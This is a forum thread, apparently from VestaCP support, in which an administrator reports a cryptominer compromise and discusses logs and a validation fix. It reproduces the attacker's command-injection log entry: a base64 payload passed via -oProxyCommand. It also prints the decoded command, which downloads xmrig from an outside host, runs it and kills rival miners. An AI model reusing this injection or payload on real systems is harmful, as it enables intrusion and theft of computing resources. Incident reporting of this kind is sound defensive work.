[CLOSED] [Urgent!] Critical Security issue in VestaCP
Hi,
We have discovered what seems to be a security issue in VestaCP. This is what we have seen until now:
Attackers upload a file in /tmp for mining: /tmp/xmrig
We have seen this in the vesta error log:
Code:
2018-06-23 01:01:40 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
This is what this does:
Code:
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/rysmn/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
We think this can be mitigated by mounting /tmp with noexec by adding this:
Code:
tmpfs /tmp tmpfs rw,nodev,nosuid,noexec 0 0
in the LXC container.
We think this is important and developers should have a look asap!
Last edited by jcerdan on Mon Jun 25, 2018 7:36 am, edited 2 times in total.
Re: Critical Security issue in VestaCP
Hi,
We have found this on /var/log/vesta/nginx-access.log
192.99.151.112 - - [23/Jun/2018:01:01:39 +0200] POST /api/index.php HTTP/1.1 "499" 0 "-" "curl/7.60.0" "-"
Regards,
Re: Critical Security issue in VestaCP
Hi,
More info: Vesta was up to date:
# dpkg -l | grep vesta
ii vesta 0.9.8-21 amd64 Vesta
ii vesta-ioncube 0.9.8-21 amd64 ionCube Loader for Vesta
ii vesta-nginx 0.9.8-21 amd64 Vesta Nginx
ii vesta-php 0.9.8-21 amd64 Vesta php-fpm
ii vesta-softaculous 0.9.8-21 amd64 softaculous plugin for Vesta
regards
Re: Critical Security issue in VestaCP
Hi,
I have checked v-add-backup-host. I think
Code:
is_user_format_valid()
should be added to the section 'Verifications'.
Please, this is important. If someone at VestaCP could have a look.
Regards.
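The kind of check this post asks for, as an added example that is not VestaCP's own code: a POSIX shell function (hypothetical name is_backup_host_format_valid, written in the style of the 'Verifications' helpers) that rejects a backup host value which ssh/sftp would parse as an option, such as the -oProxyCommand value in the log from the first post, while accepting ordinary hostnames and IPv4 addresses. The sample inputs are constructed.

```shell
#!/bin/sh
# Added example, not VestaCP code. Hypothetical helper in the style of the
# 'Verifications' section: validate the backup host argument before it is
# ever handed to ssh/sftp.
is_backup_host_format_valid() {
    value="$1"
    # Empty or over-long values are rejected (253 is the DNS name limit).
    [ -n "$value" ] && [ "${#value}" -le 253 ] || return 1
    case "$value" in
        # A leading '-' would be parsed by ssh/sftp as an option
        # (this is how -oProxyCommand=... got onto the command line).
        -*) return 1 ;;
        # Anything outside letters, digits, '.' and '-' is rejected, which
        # covers whitespace, quotes, '=', '|' and other shell metacharacters.
        *[!A-Za-z0-9.-]*) return 1 ;;
        # No empty labels: leading/trailing dot or a double dot.
        .*|*.|*..*) return 1 ;;
    esac
    # Each dot-separated label: at most 63 chars, no leading/trailing '-'.
    old_ifs=$IFS
    IFS=.
    for label in $value; do
        case "$label" in
            -*|*-) IFS=$old_ifs; return 1 ;;
        esac
        if [ "${#label}" -gt 63 ]; then IFS=$old_ifs; return 1; fi
    done
    IFS=$old_ifs
    return 0
}

# Constructed sample inputs: two legitimate hosts and three injection shapes.
for candidate in backup.example.com 203.0.113.10 \
    '-oProxyCommand=echo payload|sh' 'host.example.com x' 'host;id'; do
    if is_backup_host_format_valid "$candidate"; then
        echo "accept: $candidate"
    else
        echo "reject: $candidate"
    fi
done
```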
Re: [Urgent!] Critical Security issue in VestaCP
When exactly was that server installed?
Check creation date of /root/vst_install_backups folder.
Re: [Urgent!] Critical Security issue in VestaCP
Hi,
drwxr-xr-x 3 root root 4096 Apr 5 2017 vst_install_backups
Regards
Re: [Urgent!] Critical Security issue in VestaCP
Can you send us nginx-access.log to dev _at_ vestacp.com ?
Also, it would be nice if you could send /var/log/apache2/domains/YOUR-HOSTNAME.log (apache2 or httpd folder, depending on distribution).
Re: [Urgent!] Critical Security issue in VestaCP
Hi,
I have just sent 3 logs:
vesta nginx-access.log
vesta nginx-error.log
apache <host> log
Regards